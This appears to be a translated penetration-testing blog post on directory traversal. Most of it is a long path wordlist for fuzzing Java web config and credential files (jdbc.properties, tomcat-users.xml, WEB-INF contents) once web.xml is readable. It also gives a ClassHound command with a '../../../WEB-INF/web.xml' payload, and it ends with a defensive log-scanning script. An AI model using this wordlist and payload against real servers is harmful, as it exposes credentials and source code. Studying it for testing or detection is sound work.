Directory traversal: follow-up fuzzing after reading WEB-INF/web.xml, with a jdbc dictionary

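This article discusses how, once WEB-INF/web.xml can be read, fuzzing combined paths can yield more information. It also mentions using the tool ClassHound to detect arbitrary file download vulnerabilities and to decompile Java source code.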

When you can read WEB-INF/web.xml and want to read more information, try fuzzing with combinations of the directory paths and file names below.

/WEB-INF/classes/config/

/WEB-INF/classes/

/WEB-INF/

/WEB-INF/config/

/config/

/conf/

/application.properties
/application.yml
/application-bean.xml
/applicationContext.xml
/application-dev.properties
/application-pro.properties
/application-test.properties
/base.properties
/beans.xml
/config-application.properties
/config-applicationContext.xml
/config-application-dev.properties
/config-application-pro.properties
/config-base.properties
/config-configuration.xml
/config-context.xml
/config-custom.properties
/config-database.properties
/config-database.xml
/config-db.properties
/config-dev.properties
/config-hibernate.cfg.xml
/config-init.properties
/config-iportal.xml
/config-jdbc.properties
/config-jndi.properties
/config-latke.properties
/config-log4j.properties
/config-parameter.properties
/config-persistence.xml
/config-pro.properties
/config-server.xml
/config-servicecloud.base.properties
/config-shiro.properties
/config-shiro.xml
/config-siteadmin.xml
/config-struts.xml
/config-sun-web.xml
/config-tomcat-users.xml
/configuration.xml
/config-weaver.properties
/config-web.xml
/config-weblogic.xml
/context.xml
/custom.properties
/database.properties
/database.xml
/db.properties
/deploy.sh
/dev.properties
/hibernate.cfg.xml
/init.properties
/iportal.xml
/jdbc.properties
/jndi.properties
/latke.properties
/log4j.properties
/parameter.properties
/persistence.xml
/pro.properties
/redis.properties
/server.xml
/servicecloud.base.properties
/shiro.properties
/shiro.xml
/siteadmin.xml
/Springmvc-servlet.xml
/struts.xml
/sun-web.xml
/sys.properties
/tomcat-users.xml
/weaver.properties
/web.xml
/weblogic.xml

Complete combined jdbc dictionary:

/application.properties
/application.yml
/application-bean.xml
/applicationContext.xml
/application-dev.properties
/application-pro.properties
/application-test.properties
/base.properties
/beans.xml
/conf/application.properties
/conf/application.yml
/conf/application-bean.xml
/conf/applicationContext.xml
/conf/application-dev.properties
/conf/application-pro.properties
/conf/application-test.properties
/conf/base.properties
/conf/beans.xml
/conf/config-application.properties
/conf/config-applicationContext.xml
/conf/config-application-dev.properties
/conf/config-application-pro.properties
/conf/config-base.properties
/conf/config-configuration.xml
/conf/config-context.xml
/conf/config-custom.properties
/conf/config-database.properties
/conf/config-database.xml
/conf/config-db.properties
/conf/config-dev.properties
/conf/config-hibernate.cfg.xml
/conf/config-init.properties
/conf/config-iportal.xml
/conf/config-jdbc.properties
/conf/config-jndi.properties
/conf/config-latke.properties
/conf/config-log4j.properties
/conf/config-parameter.properties
/conf/config-persistence.xml
/conf/config-pro.properties
/conf/config-server.xml
/conf/config-servicecloud.base.properties
/conf/config-shiro.properties
/conf/config-shiro.xml
/conf/config-siteadmin.xml
/conf/config-struts.xml
/conf/config-sun-web.xml
/conf/config-tomcat-users.xml
/conf/configuration.xml
/conf/config-weaver.properties
/conf/config-web.xml
/conf/config-weblogic.xml
/conf/context.xml
/conf/custom.properties
/conf/database.properties
/conf/database.xml
/conf/db.properties
/conf/deploy.sh
/conf/dev.properties
/conf/hibernate.cfg.xml
/conf/init.properties
/conf/iportal.xml
/conf/jdbc.properties
/conf/jndi.properties
/conf/latke.properties
/conf/log4j.properties
/conf/parameter.properties
/conf/persistence.xml
/conf/pro.properties
/conf/redis.properties
/conf/server.xml
/conf/servicecloud.base.properties
/conf/shiro.properties
/conf/shiro.xml
/conf/siteadmin.xml
/conf/Springmvc-servlet.xml
/conf/struts.xml
/conf/sun-web.xml
/conf/sys.properties
/conf/tomcat-users.xml
/conf/weaver.properties
/conf/web.xml
/conf/weblogic.xml
/config/application.properties
/config/application.yml
/config/application-bean.xml
/config/applicationContext.xml
/config/application-dev.properties
/config/application-pro.properties
/config/application-test.properties
/config/base.properties
/config/beans.xml
/config/config-application.properties
/config/config-applicationContext.xml
/config/config-application-dev.properties
/config/config-application-pro.properties
/config/config-base.properties
/config/config-configuration.xml
/config/config-context.xml
/config/config-custom.properties
/config/config-database.properties
/config/config-database.xml
/config/config-db.properties
/config/config-dev.properties
/config/config-hibernate.cfg.xml
/config/config-init.properties
/config/config-iportal.xml
/config/config-jdbc.properties
/config/config-jndi.properties
/config/config-latke.properties
/config/config-log4j.properties
/config/config-parameter.properties
/config/config-persistence.xml
/config/config-pro.properties
/config/config-server.xml
/config/config-servicecloud.base.properties
/config/config-shiro.properties
/config/config-shiro.xml
/config/config-siteadmin.xml
/config/config-struts.xml
/config/config-sun-web.xml
/config/config-tomcat-users.xml
/config/configuration.xml
/config/config-weaver.properties
/config/config-web.xml
/config/config-weblogic.xml
/config/context.xml
/config/custom.properties
/config/database.properties
/config/database.xml
/config/db.properties
/config/deploy.sh
/config/dev.properties
/config/hibernate.cfg.xml
/config/init.properties
/config/iportal.xml
/config/jdbc.properties
/config/jndi.properties
/config/latke.properties
/config/log4j.properties
/config/parameter.properties
/config/persistence.xml
/config/pro.properties
/config/redis.properties
/config/server.xml
/config/servicecloud.base.properties
/config/shiro.properties
/config/shiro.xml
/config/siteadmin.xml
/config/Springmvc-servlet.xml
/config/struts.xml
/config/sun-web.xml
/config/sys.properties
/config/tomcat-users.xml
/config/weaver.properties
/config/web.xml
/config/weblogic.xml
/config-application.properties
/config-applicationContext.xml
/config-application-dev.properties
/config-application-pro.properties
/config-base.properties
/config-configuration.xml
/config-context.xml
/config-custom.properties
/config-database.properties
/config-database.xml
/config-db.properties
/config-dev.properties
/config-hibernate.cfg.xml
/config-init.properties
/config-iportal.xml
/config-jdbc.properties
/config-jndi.properties
/config-latke.properties
/config-log4j.properties
/config-parameter.properties
/config-persistence.xml
/config-pro.properties
/config-server.xml
/config-servicecloud.base.properties
/config-shiro.properties
/config-shiro.xml
/config-siteadmin.xml
/config-struts.xml
/config-sun-web.xml
/config-tomcat-users.xml
/configuration.xml
/config-weaver.properties
/config-web.xml
/config-weblogic.xml
/context.xml
/custom.properties
/database.properties
/database.xml
/db.properties
/deploy.sh
/dev.properties
/hibernate.cfg.xml
/init.properties
/iportal.xml
/jdbc.properties
/jndi.properties
/latke.properties
/log4j.properties
/parameter.properties
/persistence.xml
/pro.properties
/redis.properties
/server.xml
/servicecloud.base.properties
/shiro.properties
/shiro.xml
/siteadmin.xml
/Springmvc-servlet.xml
/struts.xml
/sun-web.xml
/sys.properties
/tomcat-users.xml
/weaver.properties
/web.xml
/WEB-INF/application.properties
/WEB-INF/application.yml
/WEB-INF/application-bean.xml
/WEB-INF/applicationContext.xml
/WEB-INF/application-dev.properties
/WEB-INF/application-pro.properties
/WEB-INF/application-test.properties
/WEB-INF/base.properties
/WEB-INF/beans.xml
/WEB-INF/config-application.properties
/WEB-INF/config-applicationContext.xml
/WEB-INF/config-application-dev.properties
/WEB-INF/config-application-pro.properties
/WEB-INF/config-base.properties
/WEB-INF/config-configuration.xml
/WEB-INF/config-context.xml
/WEB-INF/config-custom.properties
/WEB-INF/config-database.properties
/WEB-INF/config-database.xml
/WEB-INF/config-db.properties
/WEB-INF/config-dev.properties
/WEB-INF/config-hibernate.cfg.xml
/WEB-INF/config-init.properties
/WEB-INF/config-iportal.xml
/WEB-INF/config-jdbc.properties
/WEB-INF/config-jndi.properties
/WEB-INF/config-latke.properties
/WEB-INF/config-log4j.properties
/WEB-INF/config-parameter.properties
/WEB-INF/config-persistence.xml
/WEB-INF/config-pro.properties
/WEB-INF/config-server.xml
/WEB-INF/config-servicecloud.base.properties
/WEB-INF/config-shiro.properties
/WEB-INF/config-shiro.xml
/WEB-INF/config-siteadmin.xml
/WEB-INF/config-struts.xml
/WEB-INF/config-sun-web.xml
/WEB-INF/config-tomcat-users.xml
/WEB-INF/configuration.xml
/WEB-INF/config-weaver.properties
/WEB-INF/config-web.xml
/WEB-INF/config-weblogic.xml
/WEB-INF/context.xml
/WEB-INF/custom.properties
/WEB-INF/database.properties
/WEB-INF/database.xml
/WEB-INF/db.properties
/WEB-INF/deploy.sh
/WEB-INF/dev.properties
/WEB-INF/hibernate.cfg.xml
/WEB-INF/init.properties
/WEB-INF/iportal.xml
/WEB-INF/jdbc.properties
/WEB-INF/jndi.properties
/WEB-INF/latke.properties
/WEB-INF/log4j.properties
/WEB-INF/parameter.properties
/WEB-INF/persistence.xml
/WEB-INF/pro.properties
/WEB-INF/redis.properties
/WEB-INF/server.xml
/WEB-INF/servicecloud.base.properties
/WEB-INF/shiro.properties
/WEB-INF/shiro.xml
/WEB-INF/siteadmin.xml
/WEB-INF/Springmvc-servlet.xml
/WEB-INF/struts.xml
/WEB-INF/sun-web.xml
/WEB-INF/sys.properties
/WEB-INF/tomcat-users.xml
/WEB-INF/weaver.properties
/WEB-INF/web.xml
/WEB-INF/weblogic.xml
/WEB-INF/classes/application.properties
/WEB-INF/classes/application.yml
/WEB-INF/classes/application-bean.xml
/WEB-INF/classes/applicationContext.xml
/WEB-INF/classes/application-dev.properties
/WEB-INF/classes/application-pro.properties
/WEB-INF/classes/application-test.properties
/WEB-INF/classes/base.properties
/WEB-INF/classes/beans.xml
/WEB-INF/classes/config-application.properties
/WEB-INF/classes/config-applicationContext.xml
/WEB-INF/classes/config-application-dev.properties
/WEB-INF/classes/config-application-pro.properties
/WEB-INF/classes/config-base.properties
/WEB-INF/classes/config-configuration.xml
/WEB-INF/classes/config-context.xml
/WEB-INF/classes/config-custom.properties
/WEB-INF/classes/config-database.properties
/WEB-INF/classes/config-database.xml
/WEB-INF/classes/config-db.properties
/WEB-INF/classes/config-dev.properties
/WEB-INF/classes/config-hibernate.cfg.xml
/WEB-INF/classes/config-init.properties
/WEB-INF/classes/config-iportal.xml
/WEB-INF/classes/config-jdbc.properties
/WEB-INF/classes/config-jndi.properties
/WEB-INF/classes/config-latke.properties
/WEB-INF/classes/config-log4j.properties
/WEB-INF/classes/config-parameter.properties
/WEB-INF/classes/config-persistence.xml
/WEB-INF/classes/config-pro.properties
/WEB-INF/classes/config-server.xml
/WEB-INF/classes/config-servicecloud.base.properties
/WEB-INF/classes/config-shiro.properties
/WEB-INF/classes/config-shiro.xml
/WEB-INF/classes/config-siteadmin.xml
/WEB-INF/classes/config-struts.xml
/WEB-INF/classes/config-sun-web.xml
/WEB-INF/classes/config-tomcat-users.xml
/WEB-INF/classes/configuration.xml
/WEB-INF/classes/config-weaver.properties
/WEB-INF/classes/config-web.xml
/WEB-INF/classes/config-weblogic.xml
/WEB-INF/classes/context.xml
/WEB-INF/classes/custom.properties
/WEB-INF/classes/database.properties
/WEB-INF/classes/database.xml
/WEB-INF/classes/db.properties
/WEB-INF/classes/deploy.sh
/WEB-INF/classes/dev.properties
/WEB-INF/classes/hibernate.cfg.xml
/WEB-INF/classes/init.properties
/WEB-INF/classes/iportal.xml
/WEB-INF/classes/jdbc.properties
/WEB-INF/classes/jndi.properties
/WEB-INF/classes/latke.properties
/WEB-INF/classes/log4j.properties
/WEB-INF/classes/parameter.properties
/WEB-INF/classes/persistence.xml
/WEB-INF/classes/pro.properties
/WEB-INF/classes/redis.properties
/WEB-INF/classes/server.xml
/WEB-INF/classes/servicecloud.base.properties
/WEB-INF/classes/shiro.properties
/WEB-INF/classes/shiro.xml
/WEB-INF/classes/siteadmin.xml
/WEB-INF/classes/Springmvc-servlet.xml
/WEB-INF/classes/struts.xml
/WEB-INF/classes/sun-web.xml
/WEB-INF/classes/sys.properties
/WEB-INF/classes/tomcat-users.xml
/WEB-INF/classes/weaver.properties
/WEB-INF/classes/web.xml
/WEB-INF/classes/weblogic.xml
/WEB-INF/classes/config/application.properties
/WEB-INF/classes/config/application.yml
/WEB-INF/classes/config/application-bean.xml
/WEB-INF/classes/config/applicationContext.xml
/WEB-INF/classes/config/application-dev.properties
/WEB-INF/classes/config/application-pro.properties
/WEB-INF/classes/config/application-test.properties
/WEB-INF/classes/config/base.properties
/WEB-INF/classes/config/beans.xml
/WEB-INF/classes/config/config-application.properties
/WEB-INF/classes/config/config-applicationContext.xml
/WEB-INF/classes/config/config-application-dev.properties
/WEB-INF/classes/config/config-application-pro.properties
/WEB-INF/classes/config/config-base.properties
/WEB-INF/classes/config/config-configuration.xml
/WEB-INF/classes/config/config-context.xml
/WEB-INF/classes/config/config-custom.properties
/WEB-INF/classes/config/config-database.properties
/WEB-INF/classes/config/config-database.xml
/WEB-INF/classes/config/config-db.properties
/WEB-INF/classes/config/config-dev.properties
/WEB-INF/classes/config/config-hibernate.cfg.xml
/WEB-INF/classes/config/config-init.properties
/WEB-INF/classes/config/config-iportal.xml
/WEB-INF/classes/config/config-jdbc.properties
/WEB-INF/classes/config/config-jndi.properties
/WEB-INF/classes/config/config-latke.properties
/WEB-INF/classes/config/config-log4j.properties
/WEB-INF/classes/config/config-parameter.properties
/WEB-INF/classes/config/config-persistence.xml
/WEB-INF/classes/config/config-pro.properties
/WEB-INF/classes/config/config-server.xml
/WEB-INF/classes/config/config-servicecloud.base.properties
/WEB-INF/classes/config/config-shiro.properties
/WEB-INF/classes/config/config-shiro.xml
/WEB-INF/classes/config/config-siteadmin.xml
/WEB-INF/classes/config/config-struts.xml
/WEB-INF/classes/config/config-sun-web.xml
/WEB-INF/classes/config/config-tomcat-users.xml
/WEB-INF/classes/config/configuration.xml
/WEB-INF/classes/config/config-weaver.properties
/WEB-INF/classes/config/config-web.xml
/WEB-INF/classes/config/config-weblogic.xml
/WEB-INF/classes/config/context.xml
/WEB-INF/classes/config/custom.properties
/WEB-INF/classes/config/database.properties
/WEB-INF/classes/config/database.xml
/WEB-INF/classes/config/db.properties
/WEB-INF/classes/config/deploy.sh
/WEB-INF/classes/config/dev.properties
/WEB-INF/classes/config/hibernate.cfg.xml
/WEB-INF/classes/config/init.properties
/WEB-INF/classes/config/iportal.xml
/WEB-INF/classes/config/jdbc.properties
/WEB-INF/classes/config/jndi.properties
/WEB-INF/classes/config/latke.properties
/WEB-INF/classes/config/log4j.properties
/WEB-INF/classes/config/parameter.properties
/WEB-INF/classes/config/persistence.xml
/WEB-INF/classes/config/pro.properties
/WEB-INF/classes/config/redis.properties
/WEB-INF/classes/config/server.xml
/WEB-INF/classes/config/servicecloud.base.properties
/WEB-INF/classes/config/shiro.properties
/WEB-INF/classes/config/shiro.xml
/WEB-INF/classes/config/siteadmin.xml
/WEB-INF/classes/config/Springmvc-servlet.xml
/WEB-INF/classes/config/struts.xml
/WEB-INF/classes/config/sun-web.xml
/WEB-INF/classes/config/sys.properties
/WEB-INF/classes/config/tomcat-users.xml
/WEB-INF/classes/config/weaver.properties
/WEB-INF/classes/config/web.xml
/WEB-INF/classes/config/weblogic.xml
/WEB-INF/config/application.properties
/WEB-INF/config/application.yml
/WEB-INF/config/application-bean.xml
/WEB-INF/config/applicationContext.xml
/WEB-INF/config/application-dev.properties
/WEB-INF/config/application-pro.properties
/WEB-INF/config/application-test.properties
/WEB-INF/config/base.properties
/WEB-INF/config/beans.xml
/WEB-INF/config/config-application.properties
/WEB-INF/config/config-applicationContext.xml
/WEB-INF/config/config-application-dev.properties
/WEB-INF/config/config-application-pro.properties
/WEB-INF/config/config-base.properties
/WEB-INF/config/config-configuration.xml
/WEB-INF/config/config-context.xml
/WEB-INF/config/config-custom.properties
/WEB-INF/config/config-database.properties
/WEB-INF/config/config-database.xml
/WEB-INF/config/config-db.properties
/WEB-INF/config/config-dev.properties
/WEB-INF/config/config-hibernate.cfg.xml
/WEB-INF/config/config-init.properties
/WEB-INF/config/config-iportal.xml
/WEB-INF/config/config-jdbc.properties
/WEB-INF/config/config-jndi.properties
/WEB-INF/config/config-latke.properties
/WEB-INF/config/config-log4j.properties
/WEB-INF/config/config-parameter.properties
/WEB-INF/config/config-persistence.xml
/WEB-INF/config/config-pro.properties
/WEB-INF/config/config-server.xml
/WEB-INF/config/config-servicecloud.base.properties
/WEB-INF/config/config-shiro.properties
/WEB-INF/config/config-shiro.xml
/WEB-INF/config/config-siteadmin.xml
/WEB-INF/config/config-struts.xml
/WEB-INF/config/config-sun-web.xml
/WEB-INF/config/config-tomcat-users.xml
/WEB-INF/config/configuration.xml
/WEB-INF/config/config-weaver.properties
/WEB-INF/config/config-web.xml
/WEB-INF/config/config-weblogic.xml
/WEB-INF/config/context.xml
/WEB-INF/config/custom.properties
/WEB-INF/config/database.properties
/WEB-INF/config/database.xml
/WEB-INF/config/db.properties
/WEB-INF/config/deploy.sh
/WEB-INF/config/dev.properties
/WEB-INF/config/hibernate.cfg.xml
/WEB-INF/config/init.properties
/WEB-INF/config/iportal.xml
/WEB-INF/config/jdbc.properties
/WEB-INF/config/jndi.properties
/WEB-INF/config/latke.properties
/WEB-INF/config/log4j.properties
/WEB-INF/config/parameter.properties
/WEB-INF/config/persistence.xml
/WEB-INF/config/pro.properties
/WEB-INF/config/redis.properties
/WEB-INF/config/server.xml
/WEB-INF/config/servicecloud.base.properties
/WEB-INF/config/shiro.properties
/WEB-INF/config/shiro.xml
/WEB-INF/config/siteadmin.xml
/WEB-INF/config/Springmvc-servlet.xml
/WEB-INF/config/struts.xml
/WEB-INF/config/sun-web.xml
/WEB-INF/config/sys.properties
/WEB-INF/config/tomcat-users.xml
/WEB-INF/config/weaver.properties
/WEB-INF/config/web.xml
/WEB-INF/config/weblogic.xml
/weblogic.xml

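You can also use a tool to read the class files disclosed by WEB-INF/web.xml. When a read fails, the path is most likely wrong, so try several times:

Tool name: WEB-INF-Class-Fuzz-master

GitHub - LandGrey/ClassHound: uses an arbitrary file download vulnerability to repeatedly download and decompile class files and recover a website's Java source code

Usage: python38 classhound.py -u "http://127.0.0.1/download.jsp?path=#../../../WEB-INF/web.xml#"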

#../../../WEB-INF/web.xml#
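
Seen from the defender's side, requests like the one above leave a recognisable trace in access logs. The following is an added example, not code from the original post or from ClassHound: it scans constructed log lines for request values that decode to WEB-INF or to config file names from the list above. The log lines, function names and reason labels are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# A few file names from the page's list; extend with the rest as needed.
SENSITIVE_FILES = {"web.xml", "jdbc.properties", "db.properties", "application.yml",
                   "application.properties", "tomcat-users.xml", "shiro.xml"}

# Constructed access-log lines for illustration, not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /download.jsp?path=report.pdf HTTP/1.1" 200 5120
192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /download.jsp?path=../../../WEB-INF/web.xml HTTP/1.1" 200 2310
192.0.2.44 - - [01/Jan/2024:10:00:06 +0000] "GET /download.jsp?path=..%2f..%2f..%2fWEB-INF%2fclasses%2fjdbc.properties HTTP/1.1" 404 0
192.0.2.44 - - [01/Jan/2024:10:00:07 +0000] "GET /download.jsp?path=%252e%252e%252f%252e%252e%252fconf%252ftomcat-users.xml HTTP/1.1" 200 880
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded '%252e%252e' becomes '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def classify(value):
    """Return (normalised_path, reason) for a suspicious value, else None."""
    raw = fully_decode(value)
    traversal = ".." in raw.split("/")
    norm = posixpath.normpath("/" + raw.lstrip("/"))
    if "web-inf" in norm.lower().split("/"):
        return norm, "web-inf-read"
    if traversal and posixpath.basename(norm) in SENSITIVE_FILES:
        return norm, "traversal-to-config"
    return None

def detect(log_text):
    """Return (path, reason, status) per flagged request; 200 means the read likely succeeded."""
    findings = []
    for match in REQUEST_RE.finditer(log_text):
        parts = urlsplit(match.group(1))
        # Check the URL path itself and every query-parameter value.
        values = [parts.path] + [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
        hit = next(filter(None, map(classify, values)), None)
        if hit:
            findings.append((hit[0], hit[1], int(match.group(2))))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

Flagged requests that returned status 200 deserve attention first, since the file contents were probably served.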
